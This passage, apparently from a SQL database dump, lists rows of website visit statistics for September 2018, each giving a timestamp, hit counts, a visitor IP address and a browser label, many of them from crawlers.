173.101','firefox'),(304231,1537287236,1,1,0,0,'54.36.148.251','other'),(304232,1537287273,1,1,0,0,'54.36.148.24','other'),(304233,1537287772,1,1,0,0,'8.29.198.26','other'),(304234,1537287815,1,1,0,0,'8.29.198.27','other'),(304235,1537287832,1,1,0,0,'188.230.43.254','other'),(304236,1537287845,1,1,0,0,'54.36.149.60','other'),(304237,1537287892,1,1,0,0,'54.36.148.132','other'),(304238,1537287960,1,1,0,0,'54.36.148.75','other'),(304239,1537288034,1,1,0,0,'54.36.149.21','other'),(304240,1537288049,1,1,0,0,'54.36.148.220','other'),(304241,1537288072,1,1,0,0,'40.77.167.107','other'),(304242,1537288076,1,1,0,0,'54.36.148.107','other'),(304243,1537288276,1,1,0,0,'54.36.148.116','other'),(304244,1537288287,1,1,0,0,'54.36.148.22','other'),(304245,1537288736,1,1,0,0,'54.36.148.179','other'),(304246,1537288803,1,1,0,0,'91.196.178.131','firefox'),(304247,1537288859,1,1,0,0,'91.196.178.78','firefox'),(304248,1537288982,1,1,0,0,'91.227.207.9','chrome'),(304249,1537289204,1,1,0,0,'95.132.209.246','firefox'),(304250,1537289485,1,1,0,0,'54.36.148.67','other'),(304251,1537289596,1,1,0,0,'54.36.149.6','other'),(304252,1537289597,1,1,0,0,'54.36.149.99','other'),(304253,1537289709,1,1,0,0,'54.36.148.118','other'),(304254,1537289916,1,1,0,0,'54.36.148.206','other'),(304255,1537289935,1,1,0,0,'54.36.149.67','other'),(304256,1537290051,1,1,0,0,'188.230.43.254','other'),(304257,1537290150,1,1,0,0,'95.132.209.246','firefox'),(304258,1537290232,1,1,0,0,'91.217.60.123','chrome'),(304259,1537290261,1,1,0,0,'54.36.149.12','other'),(304260,1537290343,2,2,0,0,'46.211.127.232','chrome'),(304261,1537290760,1,1,0,0,'54.36.149.54','other'),(304262,1537290811,1,1,0,0,'54.36.148.233','other'),(304263,1537291058,1,1,0,0,'54.36.148.138','other'),(304264,1537291059,1,1,0,0,'95.132.209.246','firefox'),(304265,1537291065,1,1,0,0,'54.36.148.240','other'),(304266,1537291133,1,1,0,0,'54.36.149.44','other'),(304267,1537291181,1,1,0,0,'54.36.148.73','other'),(304268,1537291265,1,1,0,0,'54.36.148.49','other'),(304269,1537291394,1,1,0,0,'157.55.39.190','other'),(304270,1537291413,1,1,0,0,'54.36.149.101','other'),(304271,1537291424,1,1,0,0,'54.36.148.29','other'),(304272,1537291431,1,1,0,0,'180.76.15.149','other'),(304273,1537291598,1,1,0,0,'54.36.149.21','other'),(304274,1537291726,1,1,0,0,'54.36.148.205','other'),(304275,1537291854,1,1,0,0,'54.36.149.91','other'),(304276,1537292018,1,1,0,0,'54.36.148.72','other'),(304277,1537292159,1,1,0,0,'54.36.149.4','other'),(304278,1537292204,1,1,0,0,'54.36.149.66','other'),(304279,1537292241,1,1,0,0,'91.196.178.53','chrome'),(304280,1537292255,1,1,0,0,'8.29.198.26','other'),(304281,1537292303,1,1,0,0,'54.36.149.77','other'),(304282,1537292973,1,1,0,0,'54.36.148.109','other'),(304283,1537293115,1,1,0,0,'54.36.149.24','other'),(304284,1537293132,1,1,0,0,'54.36.148.229','other'),(304285,1537293147,1,1,0,0,'52.53.201.78','chrome'),(304286,1537293177,1,1,0,0,'54.36.148.73','other'),(304287,1537293323,1,1,0,0,'54.36.148.153','other'),(304288,1537293344,1,1,0,0,'54.36.149.81','other'),(304289,1537293786,1,1,0,0,'54.36.149.54','other'),(304290,1537294037,1,1,0,0,'54.36.148.193','other'),(304291,1537294074,1,1,0,0,'54.36.148.142','other'),(304292,1537294106,1,1,0,0,'54.36.148.94','other'),(304293,1537294406,1,1,0,0,'54.36.148.13','other'),(304294,1537294510,1,1,0,0,'54.36.148.220','other'),(304295,1537294732,1,1,0,0,'54.36.149.66','other'),(304296,1537294875,1,1,0,0,'54.36.148.76','other'),(304297,1537295330,1,1,0,0,'54.36.148.199','other'),(304298,1537295503,1,1,0,0,'40.77.167.107','other'),(304299,1537295558,1,1,0,0,'54.36.148.77','other'),(304300,1537295604,1,1,0,0,'54.36.149.15','other'),(304301,1537295635,1,1,0,0,'54.36.148.36','other'),(304302,1537295678,1,1,0,0,'54.36.148.67','other'),(304303,1537295868,1,1,0,0,'54.36.148.197','other'),(304304,1537296292,1,1,0,0,'216.244.66.241','other'),(304305,1537296298,1,1,0,0,'54.36.149.52','other'),(304306,1537296307,1,1,0,0,'54.36.148.230','other'),(304307,1537296337,1,1,0,0,'54.36.149.14','other'),(304308,1537296485,1,1,0,0,'54.36.148.194','other'),(304309,1537296511,1,1,0,0,'54.36.148.160','other'),(304310,1537296566,1,1,0,0,'54.36.148.157','other'),(304311,1537296594,1,1,0,0,'54.36.148.65','other'),(304312,1537296612,1,1,0,0,'54.36.149.97','other'),(304313,1537296639,1,1,0,0,'54.36.148.34','other'),(304314,1537296684,1,1,0,0,'54.36.148.37','other'),(304315,1537296690,1,1,0,0,'54.36.149.1','other'),(304316,1537296702,1,1,0,0,'54.36.148.182','other'),(304317,1537296802,1,1,0,0,'54.36.148.236','other'),(304318,1537297187,1,1,0,0,'54.36.148.115','other'),(304319,1537297476,1,1,0,0,'54.36.149.92','other'),(304320,1537297727,1,1,0,0,'178.154.244.11','other'),(304321,1537297848,1,1,0,0,'54.36.148.203','other'),(304322,1537297905,1,0,1,0,'66.249.65.99',''),(304323,1537297933,1,1,0,0,'54.36.148.53','other'),(304324,1537298003,1,1,0,0,'54.36.148.75','other'),(304325,1537298285,1,1,0,0,'54.36.148.55','other'),(304326,1537298607,2,2,0,0,'8.29.198.25','other'),(304327,1537298609,1,1,0,0,'54.36.148.41','other'),(304328,1537298940,1,1,0,0,'54.36.149.2','other'),(304329,1537298951,1,1,0,0,'54.36.148.112','other'),(304330,1537298984,1,1,0,0,'54.36.148.126','other'),(304331,1537299212,1,1,0,0,'95.132.209.246','firefox'),(304332,1537299355,1,1,0,0,'54.36.148.168','other'),(304333,1537299382,1,1,0,0,'54.36.149.67','other'),(304334,1537299389,1,1,0,0,'54.36.148.117','other'),(304335,1537299474,1,1,0,0,'54.36.148.89','other'),(304336,1537299497,1,1,0,0,'54.36.149.13','other'),(304337,1537299534,1,1,0,0,'54.36.149.40','other'),(304338,1537299557,1,1,0,0,'54.36.148.122','other'),(304339,1537299625,1,1,0,0,'91.196.178.61','chrome'),(304340,1537299705,1,1,0,0,'95.132.30.172','chrome'),(304341,1537299739,1,1,0,0,'54.36.148.124','other'),(304342,1537299822,1,1,0,0,'54.36.148.35','other'),(304343,1537299835,1,1,0,0,'54.36.148.16','other'),(304344,1537299890,1,1,0,0,'54.36.148.236','other'),(304345,1537299918,1,1,0,0,'157.55.39.190','other'),(304346,1537299985,1,1,0,0,'54.36.149.22','other'),(304347,1537300116,1,1,0,0,'54.36.148.109','other'),(304348,1537300155,1,1,0,0,'207.46.13.28','other'),(304349,1537300390,1,1,0,0,'91.209.11.236','other'),(304350,1537300473,1,1,0,0,'54.36.149.82','other'),(304351,1537300563,1,1,0,0,'54.36.149.89','other'),(304352,1537300654,1,1,0,0,'54.36.148.57','other'),(304353,1537300671,1,1,0,0,'178.154.244.11','other'),(304354,1537300866,1,1,0,0,'54.36.148.169','other'),(304355,1537300891,1,1,0,0,'54.36.148.153','other'),(304356,1537301140,1,1,0,0,'91.196.178.46','chrome'),(304357,1537301293,1,1,0,0,'157.55.39.190','other'),(304358,1537301829,1,1,0,0,'54.36.148.138','other'),(304359,1537302240,1,1,0,0,'54.36.148.180','other'),(304360,1537302359,1,1,0,0,'54.36.148.100','other'),(304361,1537302492,1,1,0,0,'54.36.148.172','other'),(304362,1537302511,1,1,0,0,'54.36.149.4','other'),(304363,1537302673,1,1,0,0,'54.36.148.118','other'),(304364,1537302734,1,1,0,0,'66.249.65.125','chrome'),(304365,1537302860,1,1,0,0,'54.36.148.168','other'),(304366,1537303078,1,1,0,0,'8.29.198.26','other'),(304367,1537303224,1,1,0,0,'54.36.148.125','other'),(304368,1537303292,1,1,0,0,'54.36.148.229','other'),(304369,1537303297,1,1,0,0,'5.45.207.79','other'),(304370,1537303331,1,1,0,0,'54.36.148.114','other'),(304371,1537303514,1,1,0,0,'54.36.148.177','other'),(304372,1537303632,1,1,0,0,'54.36.148.181','other'),(304373,1537303753,1,1,0,0,'54.36.148.54','other'),(304374,1537304036,1,1,0,0,'54.36.148.233','other'),(304375,1537304243,2,2,0,0,'54.36.149.1','other'),(304376,1537304454,1,1,0,0,'66.249.65.105','chrome'),(304377,1537304590,1,1,0,0,'54.36.148.112','other'),(304378,1537304759,1,1,0,0,'54.36.149.58','other'),(304379,1537304773,1,1,0,0,'54.36.149.95','other'),(304380,1537304855,2,2,0,0,'54.36.148.115','other'),(304381,1537304919,1,1,0,0,'54.36.148.132','other'),(304382,1537305005,1,1,0,0,'54.36.148.222','other'),(304383,1537305277,1,1,0,0,'54.36.149.10','other'),(304384,1537305323,1,1,0,0,'54.36.148.177','other'),(304385,1537305695,1,1,0,0,'54.36.148.123','other'),(304386,1537305816,1,1,0,0,'54.36.148.21','other'),(304387,1537305909,1,1,0,0,'54.36.148.173','other'),(304388,1537305969,1,1,0,0,'54.36.149.19','other'),(304389,1537306099,1,1,0,0,'54.36.149.0','other'),(304390,1537306128,1,1,0,0,'54.36.148.96','other'),(304391,1537306129,1,1,0,0,'54.36.148.206','other'),(304392,1537306185,1,1,0,0,'157.55.39.95','other'),(304393,1537306695,1,1,0,0,'54.36.149.23','other'),(304394,1537306843,1,1,0,0,'54.36.148.143','other'),(304395,1537306980,1,1,0,0,'54.36.149.62','other'),(304396,1537307165,1,1,0,0,'54.36.149.102','other'),(304397,1537307648,1,1,0,0,'54.36.149.21','other'),(304398,1537308086,1,1,0,0,'66.249.65.103','chrome'),(304399,1537309440,1,1,0,0,'8.29.198.25','other'),(304400,1537309502,1,1,0,0,'8.29.198.27','other'),(304401,1537310354,3,3,0,0,'195.154.173.101','firefox'),(304402,1537312345,1,0,1,0,'66.249.65.121',''),(304403,1537312346,2,2,0,0,'178.154.244.29','other'),(304404,1537313914,1,1,0,0,'8.29.198.25','other'),(304405,1537314312,1,1,0,0,'95.108.213.4','other'),(304406,1537314390,1,1,0,0,'213.180.203.9','other'),(304407,1537314474,1,1,0,0,'141.8.142.103','other'),(304408,1537314477,5,5,0,0,'178.154.244.29','other'),(304409,1537314490,3,3,0,0,'195.154.173.101','firefox'),(304410,1537314815,1,1,0,0,'95.163.255.186','other'),(304411,1537314895,1,1,0,0,'40.77.167.107','other'),(304412,1537314941,1,1,0,0,'5.45.207.79','other'),(304413,1537314996,1,1,0,0,'54.36.148.192','other'),(304414,1537315091,1,1,0,0,'54.36.149.50','other'),(304415,1537315108,1,1,0,0,'54.36.148.51','other'),(304416,1537315158,1,1,0,0,'54.36.149.4','other'),(304417,1537315196,1,1,0,0,'54.36.148.250','other'),(304418,1537315262,1,1,0,0,'54.36.148.210','other'),(304419,1537315288,1,1,0,0,'54.36.148.24','other'),(304420,1537315450,2,2,0,0,'178.154.244.29','other'),(304421,1537315525,2,2,0,0,'178.154.244.11','other'),(304422,1537315529,1,1,0,0,'54.36.149.66','other'),(304423,1537315594,1,1,0,0,'54.36.148.199','other'),(304424,1537316197,1,1,0,0,'5.45.207.79','other'),(304425,1537316201,1,1,0,0,'54.36.148.139','other'),(304426,1537316236,1,1,0,0,'54.36.148.48','other'),(304427,1537316244,1,1,0,0,'87.250.224.47','other'),(304428,1537316247,1,1,0,0,'141.8.142.103','other'),(304429,1537316523,1,1,0,0,'54.36.149.50','other'),(304430,1537316622,1,1,0,0,'54.36.148.75','other'),(304431,1537316684,1,1,0,0,'37.9.113.148','other'),(304432,1537316757,1,1,0,0,'54.36.148.144','other'),(304433,1537316779,7,7,0,0,'178.154.244.29','other'),(304434,1537316956,1,1,0,0,'178.154.171.24','other'),(304435,1537316970,1,1,0,0,'54.36.149.24','other'),(304436,1537316973,1,1,0,0,'54.36.148.157','other'),(304437,1537317019,2,2,0,0,'5.45.207.19','other'),(304438,1537317336,1,1,0,0,'54.36.148.32','other'),(304439,1537317363,2,2,0,0,'5.45.207.79','other'),(304440,1537317374,1,1,0,0,'54.36.149.47','other'),(304441,1537317533,1,1,0,0,'54.36.149.26','other'),(304442,1537317763,1,1,0,0,'66.249.65.105','chrome'),(304443,1537317808,5,5,0,0,'178.154.244.29','other'),(304444,1537317928,3,3,0,0,'178.154.244.11','other'),(304445,1537318011,2,2,0,0,'87.250.224.47','other'),(304446,1537318014,1,1,0,0,'54.36.148.59','other'),(304447,1537318157,1,1,0,0,'5.45.207.8','other'),(304448,1537318168,1,1,0,0,'54.36.148.169','other'),(304449,1537318269,1,1,0,0,'54.36.149.74','other'),(304450,1537318450,3,3,0,0,'5.45.207.79','other'),(304451,1537318476,1,1,0,0,'54.36.148.107','other'),(304452,1537318497,1,1,0,0,'54.36.148.162','other'),(304453,1537318514,1,1,0,0,'54.36.148.65','other'),(304454,1537318732,1,1,0,0,'37.9.113.148','other'),(304455,1537318760,7,7,0,0,'178.154.244.29','other'),(304456,1537318860,1,1,0,0,'180.76.15.159','other'),(304457,1537318881,12,12,0,0,'62.205.134.182','msie'),(304458,1537318962,1,1,0,0,'54.36.148.99','other'),(304459,1537319009,2,2,0,0,'141.8.142.103','other'),(304460,1537319032,5,5,0,0,'178.154.244.11','other'),(304461,1537319041,1,1,0,0,'54.36.149.97','other'),(304462,1537319048,2,2,0,0,'5.45.207.19','other'),(304463,1537319275,1,1,0,0,'213.180.203.9','other'),(304464,1537319308,1,1,0,0,'141.8.183.22','other'),(304465,1537319376,2,2,0,0,'5.45.207.79','other'),(304466,1537319390,1,1,0,0,'54.36.149.224','other'),(304467,1537319484,1,1,0,0,'54.36.148.77','other'),(304468,1537319508,1,1,0,0,'178.154.244.49','other'),(304469,1537319583,2,2,0,0,'95.108.213.4','other'),(304470,1537319595,1,1,0,0,'141.8.142.108','other'),(304471,1537319861,1,1,0,0,'216.244.66.241','other'),(304472,1537319886,1,1,0,0,'54.36.148.195','other'),(304473,1537320180,1,1,0,0,'54.36.148.156','other'),(304474,1537320214,1,1,0,0,'5.45.207.19','other'),(304475,1537320239,2,2,0,0,'54.36.148.227','other'),(304476,1537320271,1,1,0,0,'8.29.198.27','other'),(304477,1537320278,1,1,0,0,'141.8.142.103','other'),(304478,1537320279,5,5,0,0,'178.154.244.29','other'),(304479,1537320337,1,1,0,0,'8.29.198.26','other'),(304480,1537320456,1,1,0,0,'35.162.214.175','chrome'),(304481,1537320476,1,1,0,0,'54.36.148.204','other'),(304482,1537320490,1,1,0,0,'95.108.213.4','other'),(304483,1537320551,1,1,0,0,'54.36.148.41','other'),(304484,1537320722,5,5,0,0,'178.154.244.11','other'),(304485,1537320856,1,1,0,0,'54.36.148.100','other'),(304486,1537320949,1,1,0,0,'54.36.148.18','other'),(304487,1537320964,3,3,0,0,'5.45.207.79','other'),(304488,1537321152,1,1,0,0,'54.36.148.16','other'),(304489,1537321168,1,1,0,0,'54.36.149.14','other'),(304490,1537321318,5,5,0,0,'178.154.244.29','other'),(304491,1537321376,1,1,0,0,'54.36.148.236','other'),(304492,1537321616,1,1,0,0,'54.36.148.113','other'),(304493,1537321664,1,1,0,0,'54.36.149.50','other'),(304494,1537321766,3,3,0,0,'178.154.244.11','other'),(304495,1537321859,1,1,0,0,'54.36.148.144','other'),(304496,1537321938,1,1,0,0,'5.45.207.79','other'),(304497,1537322091,1,1,0,0,'54.36.148.25','other'),(304498,1537322147,1,1,0,0,'54.36.148.108','other'),(304499,1537322180,3,3,0,0,'62.210.101.101','other'),(304500,1537322251,1,1,0,0,'54.36.148.146','other'),(304501,1537322271,1,1,0,0,'54.36.148.65','other'),(304502,1537322388,1,1,0,0,'178.154.200.48','other'),(304503,1537322403,1,1,0,0,'54.36.148.205','other'),(304504,1537322410,1,1,0,0,'54.36.148.112','other'),(304505,1537322431,7,7,0,0,'178.154.244.29','other'),(304506,1537322472,1,1,0,0,'54.36.148.183','other'),(304507,1537322617,1,1,0,0,'54.36.149.16','other'),(304508,1537322690,1,1,0,0,'54.36.149.101','other'),(304509,1537322896,1,1,0,0,'54.36.149.20','other'),(304510,1537323103,1,1,0,0,'141.8.142.103','other'),(304511,1537323104,3,3,0,0,'178.154.244.11','other'),(304512,1537323432,1,1,0,0,'54.36.148.207','other'),(304513,1537323461,4,4,0,0,'178.154.244.29','other'),(304514,1537323793,4,4,0,0,'5.45.207.79','other'),(304515,1537323855,1,1,0,0,'54.36.148.11','other'),(304516,1537323860,1,1,0,0,'54.36.148.171','other'),(304517,1537323963,1,1,0,0,'54.36.148.139','other'),(304518,1537324013,1,1,0,0,'54.36.148.117','other'),(304519,1537324073,1,1,0,0,'54.36.148.152','other'),(304520,1537324267,1,1,0,0,'52.41.211.72','chrome'),(304521,1537324304,1,1,0,0,'54.36.149.64','other'),(304522,1537324671,6,6,0,0,'178.154.244.11','other'),(304523,1537324747,1,1,0,0,'54.36.148.135','other'),(304524,1537324754,1,1,0,0,'8.29.198.25','other'),(304525,1537324799,1,1,0,0,'54.36.148.91','other'),(304526,1537324818,1,1,0,0,'54.36.148.59','other'),(304527,1537324842,1,1,0,0,'54.36.148.165','other'),(304528,1537324950,6,6,0,0,'178.154.244.29','other'),(304529,1537324972,1,1,0,0,'54.36.148.47','other'),(304530,1537325192,1,1,0,0,'54.36.148.196','other'),(304531,1537325360,1,1,0,0,'54.36.148.64','other'),(304532,1537325372,1,1,0,0,'54.36.149.2','other'),(304533,1537325460,1,1,0,0,'141.8.142.103','other'),(304534,1537325831,1,1,0,0,'54.36.149.17','other'),(304535,1537325923,1,1,0,0,'54.36.149.89','other'),(304536,1537325948,1,1,0,0,'54.36.148.100','other'),(304537,1537326018,2,2,0,0,'54.36.149.96','other'),(304538,1537326094,1,1,0,0,'54.36.148.144','other'),(304539,1537326100,1,1,0,0,'54.36.148.138','other'),(304540,1537326165,1,1,0,0,'54.36.148.177','other'),(304541,1537326282,6,6,0,0,'178.154.244.29','other'),(304542,1537326285,1,1,0,0,'5.45.207.79','other'),(304543,1537326428,1,1,0,0,'54.36.148.232','other'),(304544,1537326466,1,1,0,0,'54.36.148.42','other'),(304545,1537326685,1,1,0,0,'54.36.148.129','other'),(304546,1537326717,1,1,0,0,'54.36.148.248','other'),(304547,1537326724,4,4,0,0,'178.154.244.11','other'),(304548,1537326728,1,1,0,0,'54.36.148.173','other'),(304549,1537326786,1,1,0,0,'91.196.178.131','firefox'),(304550,1537326905,1,1,0,0,'87.250.224.47','other'),(304551,1537327028,1,1,0,0,'54.36.149.14','other'),(304552,1537327054,1,1,0,0,'54.36.148.251','other'),(304553,1537327138,1,1,0,0,'54.36.148.179','other'),(304554,1537327316,5,5,0,0,'178.154.244.29','other'),(304555,1537327320,1,1,0,0,'54.36.148.66','other'),(304556,1537327356,1,1,0,0,'54.36.148.143','other'),(304557,1537327395,1,1,0,0,'54.36.148.196','other'),(304558,1537327428,1,1,0,0,'54.36.149.9','other'),(304559,1537327444,1,1,0,0,'54.36.148.132','other'),(304560,1537327452,1,1,0,0,'5.45.207.19','other'),(304561,1537327454,1,1,0,0,'54.36.148.164','other'),(304562,1537327575,1,1,0,0,'54.36.148.121','other'),(304563,1537327612,1,1,0,0,'54.36.149.37','other'),(304564,1537327628,1,1,0,0,'54.36.149.28','other'),(304565,1537327775,6,6,0,0,'178.154.244.11','other'),(304566,1537328027,1,1,0,0,'177.129.204.245','chrome'),(304567,1537328029,1,1,0,0,'37.9.113.103','other'),(304568,1537328165,1,1,0,0,'54.36.149.105','other'),(304569,1537328224,4,4,0,0,'178.154.244.29','other'),(304570,1537328274,1,1,0,0,'54.36.149.57','other'),(304571,1537328351,1,1,0,0,'54.36.148.42','other'),(304572,1537328355,1,1,0,0,'5.45.207.79','other'),(304573,1537328358,1,1,0,0,'54.36.148.52','other'),(304574,1537328428,1,1,0,0,'54.36.149.87','other'),(304575,1537328476,1,1,0,0,'54.36.148.110','other'),(304576,1537328689,1,1,0,0,'54.36.148.76','other'),(304577,1537328732,1,1,0,0,'54.36.148.245','other'),(304578,1537329020,2,2,0,0,'5.45.207.19','other'),(304579,1537329214,3,3,0,0,'178.154.244.11','other'),(304580,1537329521,1,1,0,0,'178.154.244.29','other'),(304581,1537330108,1,1,0,0,'54.36.149.106','other'),(304582,1537330503,1,1,0,0,'54.36.148.172','other'),(304583,1537330759,1,1,0,0,'54.36.148.111','other'),(304584,1537330991,1,1,0,0,'54.36.148.103','other'),(304585,1537331096,1,1,0,0,'8.29.198.26','other'),(304586,1537331167,1,1,0,0,'8.29.198.25','other'),(304587,1537331531,1,1,0,0,'54.36.148.23','other'),(304588,1537331889,1,1,0,0,'54.36.148.236','other'),(304589,1537331902,1,1,0,0,'54.36.148.15','other'),(304590,1537331980,1,1,0,0,'54.36.148.66','other'),(304591,1537332231,1,1,0,0,'54.36.149.70','other'),(304592,1537332492,1,1,0,0,'178.154.244.11','other'),(304593,1537332737,1,1,0,0,'54.36.148.89','other'),(304594,1537332884,1,1,0,0,'54.36.148.112','other'),(304595,1537333065,34,34,0,0,'54.158.52.166','other'),(304596,1537333268,2,2,0,0,'66.249.65.103','chrome'),(304597,1537333306,1,1,0,0,'54.36.148.50','other'),(304598,1537333370,1,1,0,0,'54.36.148.64','other'),(304599,1537333857,1,1,0,0,'54.36.148.15','other'),(304600,1537333905,1,1,0,0,'54.36.149.46','other'),(304601,1537333954,1,1,0,0,'157.55.39.190','other'),(304602,1537334006,1,1,0,0,'54.36.148.99','other'),(304603,1537334008,1,1,0,0,'54.36.149.57','other'),(304604,1537334037,20,20,0,0,'54.158.52.166','other'),(304605,1537334074,1,1,0,0,'54.36.148.71','other'),(304606,1537334133,4,4,0,0,'195.154.173.101','firefox'),(304607,1537334176,1,1,0,0,'54.36.148.193','other'),(304608,1537334241,1,1,0,0,'54.36.148.142','other'),(304609,1537334321,1,1,0,0,'54.36.148.126','other'),(304610,1537334532,1,1,0,0,'54.36.148.75','other'),(304611,1537334624,1,1,0,0,'66.249.65.105','chrome'),(304612,1537334646,1,1,0,0,'54.36.149.22','other'),(304613,1537334810,1,1,0,0,'54.36.148.48','other'),(304614,1537334907,1,1,0,0,'54.36.148.43','other'),(304615,1537334948,10,10,0,0,'54.158.52.166','other'),(304616,1537334969,3,3,0,0,'66.249.65.99','chrome'),(304617,1537334983,1,1,0,0,'54.36.148.106','other'),(304618,1537335143,1,1,0,0,'54.36.148.63','other'),(304619,1537335299,1,1,0,0,'54.36.148.66','other'),(304620,1537335400,1,1,0,0,'54.36.149.27','other'),(304621,1537335484,1,1,0,0,'54.36.149.40','other'),(304622,1537335591,1,1,0,0,'8.29.198.26','other'),(304623,1537335703,1,1,0,0,'54.36.149.65','other'),(304624,1537335805,1,1,0,0,'54.36.148.134','other'),(304625,1537335880,1,1,0,0,'157.55.39.190','other'),(304626,1537335952,1,1,0,0,'54.36.149.28','other'),(304627,1537335957,1,1,0,0,'54.36.148.26','other'),(304628,1537336004,2,2,0,0,'66.249.65.99','chrome'),(304629,1537336052,1,1,0,0,'54.36.148.27','other'),(304630,1537336073,11,11,0,0,'54.158.52.166','other'),(304631,1537336122,1,1,0,0,'54.36.148.40','other'),(304632,1537336350,1,1,0,0,'66.249.65.105','chrome'),(304633,1537336398,1,1,0,0,'40.77.167.107','other'),(304634,1537336476,1,1,0,0,'54.36.148.216','other'),(304635,1537336490,1,1,0,0,'54.36.148.89','other'),(304636,1537336501,1,1,0,0,'54.36.148.193','other'),(304637,1537336720,1,1,0,0,'178.154.244.11','other'),(304638,1537336870,1,1,0,0,'54.36.149.4','other'),(304639,1537336907,1,1,0,0,'54.36.148.115','other'),(304640,1537337015,16,16,0,0,'54.158.52.166','other'),(304641,1537337036,1,1,0,0,'54.36.149.22','other'),(304642,1537337041,1,1,0,0,'66.249.65.99','chrome'),(304643,1537337385,1,1,0,0,'66.249.65.105','chrome'),(304644,1537337387,1,1,0,0,'66.249.65.121','chrome'),(304645,1537337399,1,1,0,0,'91.196.178.92','chrome'),(304646,1537337730,1,1,0,0,'66.249.65.103','chrome'),(304647,1537337924,6,6,0,0,'54.158.52.166','other'),(304648,1537338014,1,1,0,0,'66.249.65.123','chrome'),(304649,1537338173,1,1,0,0,'54.36.149.88','other'),(304650,1537338256,2,2,0,0,'180.76.15.22','other'),(304651,1537338278,1,1,0,0,'54.36.148.227','other'),(304652,1537338364,1,1,0,0,'54.36.148.180','other'),(304653,1537338451,1,1,0,0,'54.36.148.88','other'),(304654,1537338609,1,1,0,0,'54.36.148.146','other'),(304655,1537338884,1,1,0,0,'216.244.66.241','other'),(304656,1537338887,1,1,0,0,'54.36.148.157','other'),(304657,1537338972,1,1,0,0,'54.36.148.213','other'),(304658,1537338978,1,1,0,0,'54.36.148.106','other'),(304659,1537339027,1,1,0,0,'54.36.149.5','other'),(304660,1537339071,1,1,0,0,'54.36.148.45','other'),(304661,1537339206,1,1,0,0,'54.36.148.80','other'),(304662,1537339225,1,1,0,0,'54.36.148.239','other'),(304663,1537339656,4,4,0,0,'195.154.173.101','firefox'),(304664,1537339720,1,1,0,0,'54.36.148.85','other'),(304665,1537339894,1,1,0,0,'54.36.148.138','other'),(304666,1537340008,2,2,0,0,'5.83.23.13','chrome'),(304667,1537340132,1,1,0,0,'54.36.148.113','other'),(304668,1537340138,1,1,0,0,'54.36.149.49','other'),(304669,1537340165,1,1,0,0,'54.36.148.231','other'),(304670,1537340209,1,1,0,0,'54.36.148.162','other'),(304671,1537340481,1,1,0,0,'178.154.244.11','other'),(304672,1537340667,1,1,0,0,'54.36.149.98','other'),(304673,1537340795,1,1,0,0,'54.36.149.105','other'),(304674,1537340798,1,1,0,0,'46.201.125.163','chrome'),(304675,1537340914,1,1,0,0,'54.36.148.114','other'),(304676,1537340942,1,1,0,0,'54.36.148.75','other'),(304677,1537340943,1,1,0,0,'54.36.148.115','other'),(304678,1537341001,1,1,0,0,'54.36.148.213','other'),(304679,1537341299,1,1,0,0,'91.124.54.171','chrome'),(304680,1537341413,1,1,0,0,'54.36.149.86','other'),(304681,1537341455,1,1,0,0,'54.36.148.168','other'),(304682,1537341928,2,2,0,0,'8.29.198.27','other'),(304683,1537342069,1,1,0,0,'54.36.148.62','other'),(304684,1537342136,1,1,0,0,'95.163.255.92','other'),(304685,1537342185,1,1,0,0,'54.36.148.218','other'),(304686,1537342296,1,1,0,0,'54.36.148.164','other'),(304687,1537342381,1,1,0,0,'54.36.148.172','other'),(304688,1537342398,1,1,0,0,'54.36.149.19','other'),(304689,1537342554,1,1,0,0,'54.36.148.182','other'),(304690,1537342666,1,1,0,0,'54.36.148.224','other'),(304691,1537342669,1,1,0,0,'178.154.244.11','other'),(304692,1537342763,1,1,0,0,'91.196.178.65','firefox'),(304693,1537342968,1,1,0,0,'54.36.148.67','other'),(304694,1537343232,1,1,0,0,'54.36.148.65','other'),(304695,1537343356,1,1,0,0,'54.36.148.128','other'),(304696,1537343517,1,1,0,0,'54.36.149.50','other'),(304697,1537343540,1,1,0,0,'54.36.148.248','other'),(304698,1537343584,1,1,0,0,'54.36.149.67','other'),(304699,1537343604,1,1,0,0,'91.196.179.25','firefox'),(304700,1537343623,1,1,0,0,'54.36.148.28','other'),(304701,1537343676,1,1,0,0,'54.36.149.107','other'),(304702,1537343970,1,1,0,0,'54.36.148.84','other'),(304703,1537344068,1,1,0,0,'54.36.149.101','other'),(304704,1537344107,1,1,0,0,'54.36.148.178','other'),(304705,1537344109,1,1,0,0,'54.36.148.118','other'),(304706,1537344134,1,1,0,0,'54.36.149.68','other'),(304707,1537344270,1,1,0,0,'54.36.149.55','other'),(304708,1537344297,1,1,0,0,'54.36.148.22','other'),(304709,1537344815,1,1,0,0,'54.36.148.67','other'),(304710,1537345311,1,1,0,0,'54.36.148.168','other'),(304711,1537345407,1,1,0,0,'54.36.148.107','other'),(304712,1537345418,1,1,0,0,'54.36.149.12','other'),(304713,1537345526,1,1,0,0,'54.36.148.46','other'),(304714,1537345527,1,1,0,0,'54.36.149.69','other'),(304715,1537346092,1,1,0,0,'54.36.148.184','other'),(304716,1537346282,1,1,0,0,'54.36.149.19','other'),(304717,1537346413,1,1,0,0,'40.77.167.107','other'),(304718,1537346427,1,1,0,0,'8.29.198.27','other'),(304719,1537346736,1,1,0,0,'54.36.148.128','other'),(304720,1537346772,1,1,0,0,'82.145.223.20','chrome'),(304721,1537346883,1,1,0,0,'54.36.149.50','other'),(304722,1537347501,1,1,0,0,'180.76.15.20','other'),(304723,1537347699,1,1,0,0,'54.36.149.64','other'),(304724,1537348130,1,1,0,0,'54.36.148.118','other'),(304725,1537348147,1,1,0,0,'54.36.149.21','other'),(304726,1537348237,1,1,0,0,'54.36.148.32','other'),(304727,1537348454,1,1,0,0,'54.36.148.97','other'),(304728,1537348565,1,1,0,0,'54.36.149.19','other'),(304729,1537348724,2,2,0,0,'91.196.178.104','chrome'),(304730,1537348863,1,0,1,0,'66.249.65.156',''),(304731,1537348978,1,1,0,0,'54.36.149.48','other'),(304732,1537349110,1,1,0,0,'54.36.149.82','other'),(304733,1537349257,1,1,0,0,'54.36.148.63','other'),(304734,1537349288,1,1,0,0,'54.36.149.74','other'),(304735,1537349892,1,1,0,0,'54.36.149.42','other'),(304736,1537350350,1,1,0,0,'54.36.148.80','other'),(304737,1537350686,1,1,0,0,'54.36.148.99','other'),(304738,1537350744,1,1,0,0,'176.98.70.92','chrome'),(304739,1537351015,1,1,0,0,'54.36.149.7','other'),(304740,1537351356,1,1,0,0,'54.36.148.52','other'),(304741,1537351367,1,1,0,0,'54.36.148.174','other'),(304742,1537351416,1,1,0,0,'54.36.149.60','other'),(304743,1537351440,1,1,0,0,'54.36.148.129','other'),(304744,1537351628,1,1,0,0,'54.36.148.78'